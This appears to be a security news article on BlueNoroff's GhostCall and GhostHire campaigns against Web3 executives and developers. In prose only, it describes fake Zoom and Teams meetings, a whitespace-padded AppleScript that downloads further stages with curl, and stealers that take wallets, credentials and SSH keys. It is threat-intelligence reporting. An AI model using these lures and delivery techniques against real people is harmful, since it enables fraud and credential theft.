The BlueNoroff threat group, also tracked as Sapphire Sleet, APT38, and TA444, has significantly evolved its targeting capabilities with sophisticated new infiltration strategies designed specifically to compromise C-level executives and senior managers within the Web3 and blockchain sectors.
The group, historically focused on financial gain through cryptocurrency theft, has unveiled two coordinated campaigns dubbed GhostCall and GhostHire that represent a substantial shift in both technical sophistication and social engineering tactics.
Securelist analysts and researchers identified these campaigns beginning in April 2025, revealing a multi-faceted approach that combines deceptive video conferencing infrastructure with advanced malware deployment chains.
The GhostCall campaign predominantly targets macOS users at technology companies and venture capital firms through fraudulent investment-related meetings, while GhostHire focuses on Web3 developers using fake recruitment processes.
Both campaigns demonstrate the group’s ability to leverage generative AI for crafting convincing phishing materials and enhancing social engineering effectiveness.
.webp "BlueNoroff Hackers Adopts New Infiltration Strategies To Attack C-Level Executives, and Managers 2")
The emergence of these campaigns marks a deliberate platform shift from Windows to macOS systems, deliberately chosen to align with the target demographic’s predominantly Apple-based infrastructure.
This strategic decision enables the group to deploy specifically engineered malware chains optimized for macOS environments, creating significantly fewer detection opportunities across typical enterprise security stacks.
Attack Vector Innovation: The Fake Video Call Infrastructure
The GhostCall campaign employs an innovative attack mechanism centered on fabricated Zoom and Microsoft Teams environments hosted on attacker-controlled domains.
Victims receive Telegram-based invitations to investment meetings featuring phishing URLs mirroring legitimate conference platforms.
Upon joining fake calls, targets encounter carefully staged scenes displaying video recordings of previously compromised victims rather than deepfakes, creating convincing authenticity.
.webp "BlueNoroff Hackers Adopts New Infiltration Strategies To Attack C-Level Executives, and Managers 4")
The interface then prompts users to download supposed SDK updates, which actually deliver malicious AppleScript files containing nearly 10,000 blank lines designed to obscure malicious payload extraction.
The infection chains employ sophisticated code injection techniques utilizing the proprietary GillyInjector framework.
The AppleScript executes a curl command downloading additional stages, ultimately installing modular malware components including CosmicDoor backdoors, RooTroy downloaders, and SilentSiphon stealer suites.
Most notably, the stealer modules comprehensively harvest sensitive data spanning cryptocurrency wallets, browser credentials, SSH keys, cloud infrastructure tokens, DevOps configurations, and Telegram account sessions.
The technical implementation showcases unprecedented sophistication, leveraging RC4 encryption for configuration management, AES-256 algorithms for payload protection, and strategic TCC database manipulation enabling unrestricted system access without user consent prompts.
This represents a significant maturation in the group’s operational capabilities and underscores the critical risks facing cryptocurrency industry executives.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
